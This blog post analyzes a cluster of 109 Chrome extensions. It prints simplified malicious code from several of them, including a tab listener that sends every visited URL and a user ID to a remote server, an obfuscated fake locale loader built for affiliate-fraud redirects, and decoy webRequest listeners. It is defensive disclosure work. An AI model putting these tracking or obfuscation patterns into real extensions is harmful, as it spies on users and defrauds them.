Another cluster of potentially malicious Chrome extensions

We’ve already seen Chrome extensions containing obfuscated malicious code. We’ve also seen PCVARK’s malicious ad blockers. When looking for more PCVARK extensions, I stumbled upon an inconspicuous extension called “Translator - Select to Translate.” The only unusual thing about it were its reviews, lots of raving positive reviews mixed with usability complains. That, and the permissions: why does a translator extension need webRequest and webRequestBlocking permissions?

When I looked into this extension, I immediately discovered a strange code block. Supposedly, it was buggy locale processing. In reality, it turned out to be an obfuscated malicious logic meant to perform affiliate fraud.

That extension wasn’t alone. I kept finding similar extensions until I had a list of 109 extensions, installed by more than 62 million users in total. While most of these extensions didn’t seem to contain malicious code (yet?), almost all of them requested excessive privileges under false pretenses. The names are often confusingly similar to established products. All of these extensions are clearly meant for dubious monetization.

Two extension listed in Chrome Web Store, both called PDF Viewer. One hat watermark “Original” on top of it, bad rating and isn’t featured. The other has Google’s ”Featured” mark and good rating, the watermark says “Fake.”

If you aren’t interested in the technical details, you should probably go straight to the list of affected extensions.

Malicious code

Altogether, I found malicious functionality in four browser extensions. There might be more, but I didn’t have time to thoroughly review more than a hundred browser extensions.

Adblock all advertisments

No, I didn’t mistype the extension name. It is really named like that.

When opened it up, this turned out to be the most lazy ad blocker I’ve ever seen. Its entire ad blocking functionality essentially consists of 33 hardcoded rules and a tiny YouTube content script.

But wait, there is some functionality to update the rules! Except: why would someone put rule updates into a tabs.onUpdated listener? This is the code running whenever a tab finishes loading (simplified):

let response = await fetch("https://smartadblocker.com/extension/rules/api", {
  method: "POST",
  credentials: "include",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({
    url: tab.url,
    userId: (await chrome.storage.sync.get("userId")).userId
  })
});
let json = await response.json();
for (let key in json)
  

Supposedly, the response is a list of rules instructing the extension to remove elements on the page by their id, class or text. In reality this website always responds with “502 Bad Gateway.”

Now the website could of course be misconfigured. It’s more likely however that the website is working as intended: logging the incoming data (each address you navigate to along with your unique ID) and producing an error message to discourage anyone who comes looking.

It’s not like the developers behind these extensions don’t know how to produce a (moderately) better ad blocker. My list also features an extension called “Adblock Unlimited” which, despite similar code, manages to ship more than 10,000 rules. It also manages to complement these rules with dynamically downloaded anti-malware rules without leaking your visited addresses. Oh, and it has “anti-malware protection”: a content script that will detect exclusively test pages like maliciouswebsitetest.com.

Translator - Select to Translate

My list features nine very similar, yet subtly different translator extensions. One of the differences in “Translator - Select to Translate” is a number of unusual functions, seemingly with the purpose of obfuscating the purpose of the code. For example, there is this gem:

var base = e => e ? atob(e) : "parse";

This function is either used with a parameter to decode Base64, or without parameters to obfuscate a JSON.parse() call. When you start looking how these weird functions are used, it all leads to the locales() function:

function locales(callback)
{
  chrome.runtime.getPackageDirectoryEntry(dirEntry =>
  {
    dirEntry.getDirectory("_locales", {}, dir =>
    {
      const reader = dir.createReader();
      const promises = [];
      reader.readEntries(entries =>
      {
        for (const entry of entries)
        {
          if (!entry.name.startsWith("."))
          {
            promises.push(new Promise((resolve, reject) =>
            {
              const name = entry.name;
              entry.getFile("../messages.json", {}, entry =>
              {
                entry.file(file =>
                {
                  const fileReader = new FileReader();
                  fileReader.onloadend = () => {
                    resolve({
                      k: name,
                      v: JSON.parse(fileReader.result)
                    });
                  };
                  fileReader.readAsText(file);
                });
              });
            }));
          }
        }
        callback(promises);
      });
    });
  });
}

On the first glance, this looks like a legitimate function to read the locale files. Except: there is a “bug,” it reads "../messages.json" instead of "messages.json". So regardless of the locale, the file being read is _locales/messages.json.

The processing of the “locales” confirms that this is not a bug but rather intentional:

combine(locales.sort()
    .filter(locale => locale.k.charCodeAt(0) % 5 != 0)
    .map(locale => locale.v.v.message + locale.v.s.message)
    .join("")
);

Yes, calculating the modulo of the first character in the locale name isn’t something you would normally find in any legitimate locale handling code. And neither would one concatenate the messages for locale strings named v and s.

When one looks at the combine() function, things only get weirder. If I got this correctly, the “locale data” is parsed by performing Base64-decoding twice and parsing the result as JSON then. And then you get code like the following (simplified here):

var upd = data.upd;
var c = document[upd.cret](upd.crif);

From the context it’s obvious: this is calling document.createElement(). But it isn’t always possible to know for sure because the malicious messages.json file is missing from the extension. Presumably, the idea was publishing the code first and adding the malicious instructions later, in an update that wouldn’t raise suspicions.

With the instructions missing, understanding the code is tricky. Many calls can be guessed by their signature however. In particular, I can see an HTML element being created to initiate a web request. Additional data is then being extracted from the HTTP headers of the response. Presumably, the actual response data is something innocuous, meant to throw anyone off track who is monitoring network traffic.

After that at least two listeners are registered, presumably for webRequest.onBeforeSendHeaders and tabs.onUpdated events. While the former replaces/adds some HTTP header, the latter manipulates addresses and redirects some websites.

Even before I found the other extensions I guessed that this is about affiliate fraud: when you visit a shopping website, this code redirects you so that you get to the shop with the “right” affiliate ID. The publisher of the extension earns a commission for “referring” you to the shop then. Of course, the same code could just as well redirect your banking session to a phishing website.

The Great Suspender and Flash Video Downloader

In case the name The Great Suspender sounds familiar and you are surprised to see it here: The Great Suspender used to be an open source extension, its code is still available on GitHub. Somebody took it and added some malicious code to it. Very similar code can be found in the Flash Video Downloader extension.

The code in question masquerades as a license check. The “license” is being downloaded from https://www.greatsuspender.com/license_verification and https://www.flashvidownloader.com/license_verification respectively. The first time this download happens, the response will be reassuring:

{"settings":"{default:[true]}","license":"FREE","enable":"true","time":20946}

Looks fine? Well, the next download after a few hours will produce the real result:

A long list of JSON objects, all containing numeric keys pr and p as well as an array r.

Difficult to read? That’s probably because the p key of these objects is actually a position referring to a long encoded string. Let’s replace it by the strings it refers to:

A long list of JSON objects, this time the p key contains strings like wayfair, target, nordvpn, creditcarma.

So p is what this code looks for in a website address. If a match is found (and a number of other conditions met), you will be redirected to https://prj1<PR>.com/<R>1 where <PR> is the digit in the pr key and <R> the second value in the array stored under the r key. All the redirects happen via the domains prj11[.]com, prj12[.]com, prj13[.]com, prj14[.]com, prj15[.]com.

There is also some special code for booking.com that will replace the aid parameter with a random affiliate out of a given list. If someone from Booking is reading and interested, the affiliate codes in question are: 1481387, 1491966, 1514055, 1575306, 1576925, 1582062, 230281, 230281, 230281, 7798654, 7798654, 7801354, 7805513, 7811018, 7811298, 7825986, 7825986.

And now that we know which domains are being used here, it’s trivial to find user complains. For example, this Reddit thread identified The Great Suspender as the culprit two years ago. But one doesn’t have to go that far, the reviews for The Great Suspender in the Chrome Web Store are full with user complains. For example, this two years old review names the problem quite explicitly:

Sod Almighty on Aug 15, 2021: This extension is malware. It redirects my browser to prj11.com when I go to ebay.

Or a newer one:

Cody Fitzpatrick on Jan 12, 2023: I used to love this extension, but it now seems contaminated with viruses / malware. This extension is DIRTY and tries to redirect you to affiliate tracking links when you go to sites like BestBuy, Newegg, and others. This is all so that the creator/author/publisher can make a COMMISSION on whatever you purchase.I would not have even noticed these redirects if I did not have a network-wide ad blocker in my home (PiHole). Very slimy. P.S. A few examples of domains I have seen it redirect to are: flexlinkspro.com, prj11.com, shara.li, and others that I did not care to write down. All of these domains are connected to affiliate marketing networks.

Yet the extension is still available in the Chrome Web Store.

What are the other extensions up to?

Four outright malicious extensions leaves 105 extensions without obvious malicious functionality. What are these up to? Are they harmless?

I sincerely doubt that. These extensions are accumulating users with the purpose of monetizing them, likely via similarly dubious means.

Policy violations

Typically, these extensions violate at least two Chrome Web Store policies. There is a policy on spam and abuse:

We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store. Extensions should provide value to users through the creation of unique content or services.

Well, 13 almost identical video downloaders, 9 almost identical volume boosters, 9 almost identical translation extensions, 5 almost identical screen recorders are definitely not providing value. What they do is making it harder to people to find proper products that solve their problem.

There is also Chrome Web Store policy on extension permissions:

Request access to the narrowest permissions necessary to implement your Product’s features or services. If more than one permission could be used to implement a feature, you must request those with the least access to data or functionality. Don’t attempt to “future proof” your Product by requesting a permission that might benefit services or features that have not yet been implemented.

Almost all of these extensions do the exact opposite: request as many permissions as they can get away with.

Access to all websites

Out of the 109 extensions listed, 102 request access to all websites, often paired with the tabs privilege. This privilege level is essential in order to conduct affiliate fraud: it allows detecting when you are about to visit a particular website.

These privileges also allow spying on you however, e.g. by compiling a browsing profile as we’ve seen with the ad blocking extension above. And they even allow injecting JavaScript code into the websites you visit.

Almost none of these extensions need this level of access for their functionality. In most cases, permissions for a single domain or the far less problematic activeTab permission would have been sufficient. In fact, in quite a few extensions one can still see https://*.youtube.com/ or activeTab in the list of permissions, only to be followed up by <all_urls> that the developers added later for reasons unrelated to functionality.

In particular, the five game extensions on my list don’t interact with websites at all. Yet all of them still request access to all websites.

The webRequest/declarativeNetRequest permission

The webRequest API and its Manifest V3 pendant declarativeNetRequest API are among the most powerful tools available to browser extensions. They allow extensions to watch all the web requests being performed by the browser. In combination with the webRequestBlocking permission, they also allow blocking any web requests or even replacing web server responses.

This is the kind of functionality required to run an ad blocker, but rarely anything else. So very few extensions should be requesting these permissions. Yet 66 out of 109 extensions (61%) on my list do. For reference: when looking at extensions with similar popularity in all of Chrome Web Store, I count only 35% of them requesting these permissions.

Presumably, Chrome Web Store performs automated checks to determine whether permissions are actually being used. So these extension contain code designed to fool these checks, e.g.:

function handleResponseHeaders() {
  chrome.webRequest.onHeadersReceived.addListener(
    details => ({ responseHeaders: details.responseHeaders }),
    { urls: ["<all_urls>"] },
    [
      "blocking",
      "responseHeaders"
    ]
  );
}

This code slows down the browser by adding a listener, yet it doesn’t actually do anything. Instead of processing the headers, it merely returns them unchanged. Also popular: extracting some data, then never using it.

But this is actually the good code because some of these decoys are harmful. Quite a few will remove security headers like Content-Security-Policy or X-Frame-Options, others will mess with the User-Agent or Set-Cookies headers. The damage here might not be obvious but it’s there.

Tab Suspender extension took another approach: it incorporated some very rudimentary and error-prone tracker blocking functionality. It makes no sense in this extension, and most likely no user enables it. But it is used as justification for the webRequest permission.

Other than the ad blockers, only some of the downloader extensions seem to have webRequest functionality that is actually useful. Yet even those got additional dummy calls, just in case. The honorary mention goes to the Classic 2048 extension which includes a dummy webRequest call without even requesting the webRequest permission.

Remote code execution

Normally, extensions are protected by the default Content Security Policy that allows only code contained within the extension to run. Malicious extensions often want to circumvent this security mechanism however, so that they can put the malicious code on some web server where it cannot be as easily inspected.

The extensions here take an easier route and relax the Content Security Policy restrictions instead. 32 out of 109 extensions (29%) allow 'unsafe-eval' in their extension manifests. For comparison, only 9% of the similarly popular extensions in Chrome Web Store do this.

I haven’t found an extension that would actually use that loophole to download and run remote JavaScript code. But maybe I simply wasn’t thorough enough.

User tracking

Almost all extensions on this list include a class which is sometimes named ExtStatTracker, more often however in a less conspicuous way. It regularly performs requests mildly masquerading as configuration downloads, except that the resulting “config” is never used.

Obviously, the purpose of these requests is transmitting data about the user: which extension, which version and, most importantly, which user. Each user is assigned a unique randomly generated identifier that is sent along with all requests.

There is also an “action” request performed when the extension starts up. Same data is being sent here as for the “config” download. The response might contain a url field, this page will open in a new tab then. No, I wouldn’t count on it being a welcome page.

Each extension uses its own domain as tracking endpoint. This domain often doesn’t match the extension name however, either because the extension name changed too often or because the developers simply didn’t care to use a matching domain name.

Rudimentary functionality

Clearly, providing a great user experience was never the goal of these extensions. Their idea was rather making it seem like the extension is working with as little effort as possible. The better extensions appear to be based on some previous work, either open source code or an existing product that changed hands. Others have been built from scratch and barely function at all.

So it’s not surprising that the review sections are filling up with complains about functional issues. Still, most of these extensions have four or more stars on average. For once, many of them are begging for reviews. Some reviewers even complain that they are required to review before using the extension.

But there are also more classic fake reviews of course. These don’t even mention extension functionality but simply go on raving about how the extension changed their life.

Some reviews show that at least some of the extensions used to have an entirely different purpose. For example, not all the ChatGPT extensions are new. At least one of them used to be a translation extension which got repurposed.

The companies developing these extensions

Most of these extensions are published anonymously. The developer’s email address is always some meaningless Gmail account. If there is any website content at all, it is largely meaningless as well. The privacy policy is some generic text not mentioning the developers and barely mentioning the extension at all – and then often enough with a wrong name.

So I was very surprised to discover that Moment Dashboard and Infinite Dashboard extensions list a developing company in their privacy policies. These extensions are monetizing themselves via the search field on the new tab page, so maybe the developers considered this business model legal enough to mention a name.

Either way, Moment Dashboard is developed by Kodice LLC based in Dubai, United Arab Emirates, and Infinite Dashboard is developed by Karbon Project LP based in London, UK. Yes, two different companies, despite these two extensions being close to identical.

This seeming contradiction is resolved when you look at the management of these companies. Turns out, the CEO of Karbon Project LP moved on to be the co-founder of Kodice LLC.

But that’s not all of it yet. The same person also founded Bigture, a company based in Warsaw, Poland. As it turns out, Bigture develops Dark Theme Tab extension which also made my list.

And that uTab Dashboard? Developed by another London-based startup: Appolo One LTD. Coincidentally, their founder happens to be a partner at Kodice LLC. And he is also the CTO who is recruiting developers for the Hong Kong based BroCode LTD. No, not in Hongkong but for the office in Kharkiv, Ukraine (before the war).

Screenshot of a Russian-language vacancy for a JavaScript Developer
A vacancy at BroCode LTD from November 2020, looking for a JavaScript developer to “create new cool browser extensions and support/improve existing ones.”

Another related extension: Clock New Tab. This one was developed by a Cyprus-based T.M.D.S. TECHNICAL MANAGEMENT LIMITED. Or maybe Bigture, depending on which Clock New Tab website you look at. Yes, the two websites are still online and have identical design. The two extensions are gone however, removed from Mozilla’s add-ons website in 2021.

Two identical texts describing Clock New Tab put next to each other. The text at the top says “This project is proudly developed by the dedicated team of a Bigture company.” The text at the bottom says “This project is proudly developed by the dedicated team of a T.M.D.S. TECHNICAL MANAGEMENT LIMITED.”

If all of this sounds like a money laundering scheme, then maybe that’s because it is one.

Either way, these companies describe themselves as specializing in advertising and affiliate marketing. Karbon Project existed since 2011 according to their website. While their incorporation papers show being founded in 2018 by two companies based on Seychelles, there is in fact evidence that it existed prior to that.

And they apparently already made a name for themselves as makers of potentially unwanted software. In addition to browser extensions, they also publish at least two web browsers. I checked the corresponding installers with VirusTotal and: surprise, they are being detected as trojans! [1] [2]

Oh, and just because this hasn’t been enough fun already: these browser installers are signed by Rizzo Media LP which shares its address with Karbon Project LP in London. It has also been founded by the same two Seychelles companies.

I sent an email to Karbon Project LP, Kodice LLC and Bigture asking for comment on who developed all these browser extensions. So far neither company replied.

The affected extensions

This list is certain to be incomplete. It’s mostly based on my sample of 1,670 popular Chrome extensions, not all of Chrome Web Store. User counts reflect the state for 2023-06-05.

Note that only the first four of these extensions are currently malicious from what I can tell. However, they were clearly created with the intention of abusing extension privileges at some point. Note also that the extension names change frequently and only the IDs can be used to reliably identify an extension.

While allowing execution of remote code (unsafe-eval) isn’t technically a permission, I listed it under permissions to simplify the presentation.

Update (2023-06-12): The complete list of extension IDs from this article series can be found here. This repository also contains the check-extensions command-line utility which will search local browser profiles for these extensions.

Name Weekly active users Extension ID Relevant permissions
Adblock all advertisments - No Ads extension 741,224 gbdjcgalliefpinpmggefbloehmmknca All websites
declarativeNetRequest
tabs
Translator - Select to Translate 528,568 eggeoellnjnnglaibpcmggjnjifeebpi All websites
webRequest
notifications
Flash Video Downloader 240,450 ionpbgeeliajehajombdeflogfpgmmel All websites
downloads
tabs
webRequest
unsafe-eval
The Great Suspender 174,646 jaekigmcljkkalnicnjoafgfjoefkpeg All websites
history
tabs
Floating Video - Picture in Picture mode 102,486 aeilijiaejfdnbagnpannhdoaljpkbhe All websites
webRequest
Sidebarr - chatgpt, bookmarks, apps and more 162,384 afdfpkhbdpioonfeknablodaejkklbdn All websites
bookmarks
tabs
webRequest
Cute Cursors - Custom Cursor for Chrome™ 1,022,641 anflghppebdhjipndogapfagemgnlblh All websites
tabs
Volume Booster 4,536,673 anmbbeeiaollmpadookgoakpfjkbidaf All websites
tabs
tabCapture
webRequest
Translator Pro - Quick Translate 486,062 bebmphofpgkhclocdbgomhnjcpelbenh All websites
tabs
webRequest
unsafe-eval
Screen Capture, Screenshot, Annotations 568,357 bmkgbgkneealfabgnjfeljaiegpginpl All websites
webRequest
unsafe-eval
Sound Booster & Volume Control 2,341,097 ccjlpblmgkncnnimcmbanbnhbggdpkie All websites
tabCapture
webRequest
Paint Online 171,048 cclhgechkjghfaoebihpklmllnnlnbdb All websites
webRequest
unsafe-eval
Sidegram | Web Client for Instagram™ 282,701 cfegchignldpfnjpodhcklmgleaoanhi All websites
cookies
downloads
tabs
webRequest
Roblox with extras! - RoBox 362,890 cfllfglbkmnbkcibbjoghimalbileaic All websites
notifications
webRequest
Video Downloader Plus 785,815 cjljdgfhkjbdbkcdkfojleidpldagmao All websites
downloads
tabs
webRequest
Paint Tool for Chrome 213,277 coabfkgengacobjpmdlmmihhhfnhbjdm All websites
Free privacy connection - VPN Guru 529,711 dcaffjpclkkjfacgfofgpjbmgjnjlpmh All websites
proxy
webRequest
Screenshot Master and Screen Recorder 717,617 djekgpcemgcnfkjldcclcpcjhemofcib All websites
desktopCapture
downloads
identity
tabCapture
tabs
unsafe-eval
Video Downloader Plus 850,811 dkbccihpiccbcheieabdbjikohfdfaje All websites
downloads
tabs
webRequest
Night Shift Mode 194,983 dlpimjmonhbmamocpboifndnnakgknbf All websites
tabs
Music Downloader - VKsaver 278,761 dmbjkidogjmmlejdmnecpmfapdmidfjg All websites
webRequest
unsafe-eval
Web Color Picker - online color grabber 346,145 dneifdhdmnmmlobjbimlkcnhkbidmlek All websites
notifications
webRequest
Free Paint Online - Draw on any website 298,489 doiiaejbgndnnnomcdhefcbfnbbjfbib All websites
webRequest
unsafe-eval
Block Site: Site Blocker & Focus Mode 450,216 dpfofggmkhdbfcciajfdphofclabnogo All websites
notifications
tabs
Classic 2048 online game 255,101 eabhkjojehdleajkbigffmpnaelncapp All websites
Gmail Notifier - gmail notification tool 128,201 ealojglnbikknifbgleaceopepceakfn All websites
notifications
tabs
webRequest
Audio Capture - Sound Recorder 429,608 ebdbcfomjliacpblnioignhfhjeajpch All websites
downloads
tabCapture
Screenshot Tool - Screen Capture & Editor 784,002 edlifbnjlicfpckhgjhflgkeeibhhcii All websites
unsafe-eval
New Tab with chatgpt for Chrome 163,289 ehmneimbopigfgchjglgngamiccjkijh All websites
tabs
New Tab for Google Workspace™ 177,701 ehpgcagmhpndkmglombjndkdmggkgnge bookmarks
history
management
topSites
paint 230,984 ejllkedmklophclpgonojjkaliafeilj All websites
tabs
webRequest
unsafe-eval
Online messengers in All-in-One chat 284,493 ekjogkoigkhbgdgpolejnjfmhdcgaoof All websites
tabs
webRequest
Video Downloader Ultimate 654,295 elpdbicokgbedckgblmbhoamophfbchi All websites
downloads
webRequest
unsafe-eval
Web Paint 499,229 emeokgokialpjadjaoeiplmnkjoaegng All websites
webRequest
unsafe-eval
Color picker tool - geco 821,616 eokjikchkppnkdipbiggnmlkahcdkikp All websites
notifications
webRequest
VPN Unlimited - Best VPN by unblock 302,077 epeigjgefhajkiiallmfblgglmdbhfab All websites
proxy
webRequest
Flash Player Enabler 314,400 eplfglplnlljjpeiccbgnijecmkeimed All websites
notifications
ChatGPT Plus for Google 660,571 fbbjijdngocdplimineplmdllhjkaece All websites
webRequest
Volume Booster - Sound Master pro 1,056,902 fbjhgeaafhlbjiejehpjdnghinlcceak All websites
tabCapture
webRequest
Video Downloader for Chrome 432,088 fedchalbmgfhdobblebblldiblbmpgdj All websites
downloads
webRequest
unsafe-eval
InSaverify | Web for Instagram™ 723,983 fobaamfiblkoobhjpiigemmdegbmpohd All websites
downloads
webRequest
Video Speed Controller - video manager 571,724 gaiceihehajjahakcglkhmdbbdclbnlf None
Sound Equalizer with Volume Booster 160,716 gceehiicnbpehbbdaloolaanlnddailm All websites
tabCapture
unsafe-eval
How to Take Screenshot 718,442 ggacghlcchiiejclfdajbpkbjfgjhfol All websites
notifications
Dark Theme - Night Shift Mode 741,084 gjjbmfigjpgnehjioicaalopaikcnheo All websites
tabs
Quick Translate: Reading & writing translator 145,527 gpdfpljioapjogbnlpmganakfjcemifk All websites
declarativeNetRequest
tabs
HD Video Downloader 783,475 hjlekdknhjogancdagnndeenmobeofgm All websites
downloads
webRequest
Picture in Picture - Floating Player 790,847 hlbdhflagoegglpdminhlpenkdgloabe All websites
webRequest
Translator - Web translate, Dictionary 143,032 hnfabcchmopgohnhkcojhocneefbnffg All websites
unsafe-eval
2048 Game 579,610 iabflonngmpkalkpbjonemaamlgdghea All websites
webRequest
Select to translate - Translator, Dictionary 834,660 ibppednjgooiepmkgdcoppnmbhmieefh All websites
tabs
webRequest
Simple Translate: Select to Translate 148,542 icchadngbpkcegnabnabhkjkfkfflmpj All websites
declarativeNetRequest
tabs
Quick Translator - Translate, Dictionary 289,479 ielooaepfhfcnmihgnabkldnpddnnldl All websites
webRequest
BlockSite: Free Site Blocker & Focus Mode 447,353 ifdepgnnjpnbkcgempionjablajancjc All websites
notifications
tabs
unsafe-eval
Scrnli Screen Recorder & Screen Capture App 1,391,249 ijejnggjjphlenbhmjhhgcdpehhacaal All websites
desktopCapture
tabCapture
unsafe-eval
Web Paint Tool - draw online 540,374 iklgljbighkgbjoecoddejooldolenbj All websites
webRequest
unsafe-eval
Free Screen Recorder for Chrome 1,397,721 imopknpgdihifjkjpmjaagcagkefddnb All websites
desktopCapture
downloads
identity
tabCapture
unsafe-eval
Sound Booster & Pro equalizer- Audio Master 908,736 jchmabokofdoabocpiicjljelmackhho All websites
tabCapture
tabs
webRequest
PDF Viewer 159,253 jdlkkmamiaikhfampledjnhhkbeifokk All websites
webRequest
Video Downloader Online 659,516 jglemppahimembneahjbkhjknnefeeio All websites
downloads
tabs
webRequest
Adblock Unlimited - ad blocker 633,692 jiaopkfkampgnnkckajcbdgannoipcne All websites
declarativeNetRequest
Audio Capture - Volume Recorder 282,691 jjgnkfncaadmaobenjjpmngdpgalemho All websites
downloads
tabCapture
webRequest
ChatGPT for Search - Support GPT-4 709,522 jlbpahgopcmomkgegpbmopfodolajhbl None
Adblock for YouTube™ 477,901 jpefmbpcbebpjpmelobfakahfdcgcmkl All websites
tabs
unsafe-eval
Chatgpt lite - OpenAI 452,660 khdnaopfklkdcloiinccnaflffmfcioa All websites
webRequest
Doodle games 172,823 kjgkmceledmpdnmgmppiekdbnamccdjp All websites
webRequest
Tab Suspender 144,708 laameccjpleogmfhilmffpdbiibgbekf All websites
tabs
webRequest
unsafe-eval
Adblock for Youtube - ad blocker tool 504,747 lagdcjmbchphhndlbpfajelapcodekll All websites
tabs
Image Downloader - Save photos and pictures 1,108,637 lbohagbplppjcpllnhdichjldhfgkicb All websites
downloads
webRequest
Video Downloader Wise 334,204 ledkggjjapdgojgihnaploncccgiadhg All websites
cookies
downloads
tabs
webRequest
unsafe-eval
Moment - #1 Personal Dashboard for Chrome 145,695 lgecddhfcfhlmllljooldkbbijdcnlpe topSites
unsafe-eval
Skip Ad - Ad Block & Auto Ad Skip on YouTube 737,164 lkahpjghmdhpiojknppmlenngmpkkfma All websites
webRequest
Wowsearch 9,871 lkciiknpgglgbbcgcpbpobjabglmpkle webRequest
unsafe-eval
Flash Player for Web 838,775 lkhhagecaghfakddbncibijbjmgfhfdm All websites
notifications
Web client for Instagram™ 147,377 lknpbgnookklokdjomiildnlalffjmma All websites
downloads
webRequest
Web translator, dictionary - simple translate 797,018 lojpdfjjionbhgplcangflkalmiadhfi All websites
webRequest
unsafe-eval
Video downloader - download any video for free 451,102 mdkiofbiinbmlblcfhfjgmclhdfikkpm All websites
downloads
webRequest
unsafe-eval
Infinite Dashboard - New Tab like no other 233,688 meffljleomgifbbcffejnmhjagncfpbd All websites
tabs
topSites
unsafe-eval
ChatGPT Assistant for Chrome | SidebarGPT 301,246 mejjgaogggabifjfjdbnobinfibaamla All websites
tabs
Good Video Downloader 394,903 mhpcabliilgadobjpkameggapnpeppdg All websites
downloads
webRequest
unsafe-eval
Video Downloader Unlimited 716,091 mkjjckchdfhjbpckippbnipkdnlidbeb All websites
downloads
webRequest
Video Downloader by 1qvid 986,983 mldaiedoebimcgkokmknonjefkionldi All websites
downloads
webRequest
Chatgpt friend 565,345 mlkjjjmhjijlmafgjlpkiobpdocdbncj webRequest
Picture-in-Picture - floating video 794,535 mndiaaeaiclnmjcnacogaacoejchdclp All websites
unsafe-eval
Translator uLanguage - Translate, Dictionary 709,192 mnlohknjofogcljbcknkakphddjpijak All websites
tabs
VPN Surf - Fast VPN by unblock 443,066 nhnfcgpcbfclhfafjlooihdfghaeinfc All websites
proxy
webRequest
ChatGPT for Chrome - search GPT 1,057,279 ninecedhhpccjifamhafbdelibdjibgd None
Sound Booster - increase volume up 752,471 nmigaijibiabddkkmjhlehchpmgbokfj All websites
tabCapture
tabs
Text Reader (Text to Speech) TTS by Read me 312,121 npdkkcjlmhcnnaoobfdjndibfkkhhdfn All websites
webRequest
uTab - Unlimited Custom Dashboard 234,918 npmjjkphdlmbeidbdbfefgedondknlaf All websites
bookmarks
Flash Player Update 497,248 oakbcaafbicdddpdlhbchhpblmhefngh All websites
unsafe-eval
Web paint tool by Painty 432,129 obdhcplpbliifflekgclobogbdliddjd All websites
tabs
topSites
Night Shift 213,620 ocginjipilabheemhfbedijlhajbcabh All websites
Editing for Docs, Sheets & Slides 167,677 oepjogknopbbibcjcojmedaepolkghpb All websites
webRequest
unsafe-eval
Accept all cookies 292,192 ofpnikijgfhlmmjlpkfaifhhdonchhoi All websites
webRequest
VolumeUp - Sound booster 731,585 ogadflejmplcdhcldlloonbiekhnlopp All websites
tabCapture
tabs
The cleaner - delete cookies and cache 133,968 ogfjgagnmkiigilnoiabkbbajinanlbn All websites
cookies
tabs
webRequest
Screenshot & Screen Recorder 288,528 okkffdhbfplmbjblhgapnchjinanmnij All websites
downloads
tabCapture
tabs
webRequest
All Doodle games 134,820 oodkhhminilgphkdofffddlgopkgbgpm All websites
Super Mario Bros Game 163,597 pegfdldddiilihjahcpdehhhfcbibipg All websites
declarativeNetRequest
Custom Cursor for Chrome 785,639 phfkifnjcmdcmljnnablahicoabkokbg All websites
tabs
Text mode for websites - Readbee 451,865 phjbepamfhjgjdgmbhmfflhnlohldchb All websites
Dark Mode - Dark Reader for Сhrome 4,557,935 pjbgfifennfhnbkhoidkdchbflppjncb All websites
tabs
webRequest
Sound Booster - Boost My Bass 124,554 plmlopfeeobajiecodiggabcihohcnge All websites
tabCapture
tabs
Sound Booster 144,170 pmilcmjbofinpnbnpanpdadijibcgifc All websites
tabCapture
tabs
Screen Capture - Screenshot Tool 748,022 pmnphobdokkajkpbkajlaiooipfcpgio All websites
downloads
tabs
unsafe-eval
Picture-in-Picture - floating video 706,151 pnanegnllonoiklmmlegcaajoicfifcm All websites
tabs
unsafe-eval
Save quickly and repost 918,667 pnlphjjfielecalmmjjdhjjninkbjdod All websites
cookies
downloads
tabs
webRequest
History & Cache Cleaner - Smart Clean 277,722 pooaemmkohlphkekccfajnbcokjlbehk All websites
cookies
tabs
webRequest

Comments

  • asdf

    it would be nice a commandline for batch trying and removing any of the extensions listed above

  • Robert Irelan

    Change directory to your Chrome profile extensions directory (on macOS, run cd "$HOME/Library/Application Support/Google/Chrome/Default/Extensions" for the default profile) and run the following: ls | grep -E '(gbdjcgalliefpinpmggefbloehmmknca|eggeoellnjnnglaibpcmggjnjifeebpi|ionpbgeeliajehajombdeflogfpgmmel|jaekigmcljkkalnicnjoafgfjoefkpeg|aeilijiaejfdnbagnpannhdoaljpkbhe|afdfpkhbdpioonfeknablodaejkklbdn|anflghppebdhjipndogapfagemgnlblh|anmbbeeiaollmpadookgoakpfjkbidaf|bebmphofpgkhclocdbgomhnjcpelbenh|bmkgbgkneealfabgnjfeljaiegpginpl|ccjlpblmgkncnnimcmbanbnhbggdpkie|cclhgechkjghfaoebihpklmllnnlnbdb|cfegchignldpfnjpodhcklmgleaoanhi|cfllfglbkmnbkcibbjoghimalbileaic|cjljdgfhkjbdbkcdkfojleidpldagmao|coabfkgengacobjpmdlmmihhhfnhbjdm|dcaffjpclkkjfacgfofgpjbmgjnjlpmh|djekgpcemgcnfkjldcclcpcjhemofcib|dkbccihpiccbcheieabdbjikohfdfaje|dlpimjmonhbmamocpboifndnnakgknbf|dmbjkidogjmmlejdmnecpmfapdmidfjg|dneifdhdmnmmlobjbimlkcnhkbidmlek|doiiaejbgndnnnomcdhefcbfnbbjfbib|dpfofggmkhdbfcciajfdphofclabnogo|eabhkjojehdleajkbigffmpnaelncapp|ealojglnbikknifbgleaceopepceakfn|ebdbcfomjliacpblnioignhfhjeajpch|edlifbnjlicfpckhgjhflgkeeibhhcii|ehmneimbopigfgchjglgngamiccjkijh|ehpgcagmhpndkmglombjndkdmggkgnge|ekjogkoigkhbgdgpolejnjfmhdcgaoof|elpdbicokgbedckgblmbhoamophfbchi|emeokgokialpjadjaoeiplmnkjoaegng|eokjikchkppnkdipbiggnmlkahcdkikp|epeigjgefhajkiiallmfblgglmdbhfab|eplfglplnlljjpeiccbgnijecmkeimed|fbbjijdngocdplimineplmdllhjkaece|fbjhgeaafhlbjiejehpjdnghinlcceak|fedchalbmgfhdobblebblldiblbmpgdj|fobaamfiblkoobhjpiigemmdegbmpohd|gaiceihehajjahakcglkhmdbbdclbnlf|gceehiicnbpehbbdaloolaanlnddailm|ggacghlcchiiejclfdajbpkbjfgjhfol|gjjbmfigjpgnehjioicaalopaikcnheo|gpdfpljioapjogbnlpmganakfjcemifk|hjlekdknhjogancdagnndeenmobeofgm|hlbdhflagoegglpdminhlpenkdgloabe|hnfabcchmopgohnhkcojhocneefbnffg|iabflonngmpkalkpbjonemaamlgdghea|ibppednjgooiepmkgdcoppnmbhmieefh|icchadngbpkcegnabnabhkjkfkfflmpj|ielooaepfhfcnmihgnabkldnpddnnldl|ifdepgnnjpnbkcgempionjablajancjc|ijejnggjjphlenbhmjhhgcdpehhacaal|iklgljbighkgbjoecoddejooldolenbj|imopknpgdihifjkjpmjaagcagkefddnb|jchmabokofdoabocpiicjljelmackhho|jdlkkmamiaikhfampledjnhhkbeifokk|jglemppahimembneahjbkhjknnefeeio|jiaopkfkampgnnkckajcbdgannoipcne|jjgnkfncaadmaobenjjpmngdpgalemho|jlbpahgopcmomkgegpb